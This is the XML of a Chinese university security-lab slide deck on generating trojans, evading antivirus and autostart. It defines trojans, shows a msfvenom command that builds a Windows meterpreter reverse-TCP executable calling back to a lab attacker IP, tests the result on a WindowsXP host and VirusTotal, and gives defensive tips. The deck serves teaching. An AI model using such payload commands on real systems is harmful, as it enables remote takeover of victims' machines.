                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>减少使用共享文件夹，并将资源管理器配置成始终显示扩展名</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THANKS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木马生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马简介</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569934"/>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木马</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>特洛伊木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Trojan Horse)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>是指寄宿在计算机里的一种非授权的远程控制程序，由于木马程序能够在计算机管理员未发觉的情况下开放系统权限、泄漏用户信息、甚至窃取整个计算机管理使用权限，使得它成为了黑客们最为常用的工具之一。</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木马生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成木马</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876063" y="2350610"/>
            <a:ext cx="8694263" cy="1005147"/>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生成木马：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>工具生成木马，攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WindowsXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>主机。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="893693"/>
            <a:ext cx="12192000" cy="56913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木马生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成木马</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442976"/>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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>生成木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -a x86 --platform windows -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=192.168.47.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>（攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>地址）  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LPORT=5555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>（攻击机监听端口） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-f exe -o /root/test.exe</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木马生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马测试</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938213" y="1352551"/>
            <a:ext cx="10315574" cy="415289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212" y="1352550"/>
            <a:ext cx="10315575" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="right-quote-sign_36811"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10918015" y="525926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木马生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马测试</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361013"/>
            <a:ext cx="9983065" cy="435901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351" y="1361014"/>
            <a:ext cx="9983065" cy="4359018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="right-quote-sign_36811"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10804588" y="534091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使用杀毒引擎检测</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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725143" y="2235200"/>
            <a:ext cx="8694263" cy="525016"/>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杀毒引擎检测结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1462175"/>
            <a:ext cx="12192000" cy="3797982"/>
            <a:chOff x="0" y="1782686"/>
            <a:chExt cx="12192000" cy="3797982"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1782686"/>
              <a:ext cx="12192000" cy="3797982"/>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2686"/>
              <a:ext cx="12192000" cy="3079083"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641022" y="978668"/>
            <a:ext cx="2014398" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> - Home</a:t>
            </a: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2d8815c8-4911-49be-b97a-6a3835bcb5af"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZDMxMTRiYzQwOGRkNTc2OTYwNDIzZjQyYWY4N2VmMTA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1192</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>118</Paragraphs>
  <Slides>33</Slides>
  <Notes>3</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>10</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>1_OfficePLUS</vt:lpstr>
      <vt:lpstr>1_Office 主题​​</vt:lpstr>
      <vt:lpstr>2_Office 主题​​</vt:lpstr>
      <vt:lpstr>3_Office 主题​​</vt:lpstr>
      <vt:lpstr>5_Office 主题​​</vt:lpstr>
      <vt:lpstr>4_Office 主题​​</vt:lpstr>
      <vt:lpstr>6_Office 主题​​</vt:lpstr>
      <vt:lpstr>8_Office 主题​​</vt:lpstr>
      <vt:lpstr>7_Office 主题​​</vt:lpstr>
      <vt:lpstr>木马生成、免杀及自启动实验  信息安全综合实践课堂报告</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>木马生成</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>木马免杀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木马自启动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CSD SJTU</cp:lastModifiedBy>
  <cp:revision>150</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-23T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T08:05:55Z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CF3583A1A8434528AFC08B6F383272E7_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14309</vt:lpwstr>
  </property>
</Properties>
</file>